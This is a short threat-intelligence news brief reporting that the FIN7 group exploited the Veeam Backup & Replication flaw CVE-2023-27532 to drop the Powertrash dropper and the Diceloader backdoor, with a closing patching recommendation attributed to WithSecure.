The Russian threat group FIN7 has been found exploiting unpatched Veeam Backup & Replication instances. FIN7, which has been active since at least 2015, primarily focuses on financially motivated crimes related to stealing credit card information.

What’s buggin’

In early March, Veeam Backup & Replication vulnerability CVE-2023-27532, with a CVSS score of 7.5, was disclosed and patched. 
  • Approximately two weeks later, its Proof-of-Concept (PoC) exploitation code was publicly released.
  • Veeam stated that if successfully exploited, the bug could enable an attacker to obtain encrypted credentials stored in the Veeam backup database.
  • Horizon3.ai, the penetration testing firm that released the PoC, claimed that the flaw allows attackers to access cleartext credentials.

Fin7 drops tools

The threat actor was observed engaging in various malicious activities, including network reconnaissance, stealing data from the Veeam backup database, exfiltrating stored credentials, achieving persistence for the Diceloader backdoor, and lateral movement using stolen credentials.
  • The Powertrash in-memory dropper, a known tool used by FIN7, was observed being downloaded and executed by a shell command during a Veeam Backup process. 
  • This dropper was used to carry Diceloader or Lizar, a backdoor also associated with FIN7, which allows the attackers to perform various post-exploitation actions.

While it is unclear how the initial shell commands were invoked by the threat actors, it is suspected that they exploited the CVE-2023-27532 in Veeam Backup & Replication, which can grant unauthorized access to the instance. 

FIN7 in headlines

Recently, security experts spotted a new Domino malware campaign and linked it to ITG23 - the TrickBot-Conti syndicate.
  • However, the Domino backdoor has been developed by FIN7 that is used to drop Cobalt Strike or Project Nemesis info-stealer. 
  • Furthermore, Domino shares similarities with the Lizar backdoor, used in the latest campaign, which connects the malware to FIN7. 
  • Such exchange of malware among actors highlights the growing trend of forming partnerships among threat groups for enhanced profits.

The bottom line

WithSecure recommends organizations patch and configure their backup servers and look for signs of compromise with the IOCs mentioned in the report. The security researchers identified two instances of the latest attacks. 

Since the initial activities in both instances originated from the same public IP address on the same day, it is probable that they were part of a larger campaign. However, the scope of this attack is likely limited due to the rarity of Veeam backup servers with TCP port 9401 exposed publicly.
Cyware Publisher

Publisher

Cyware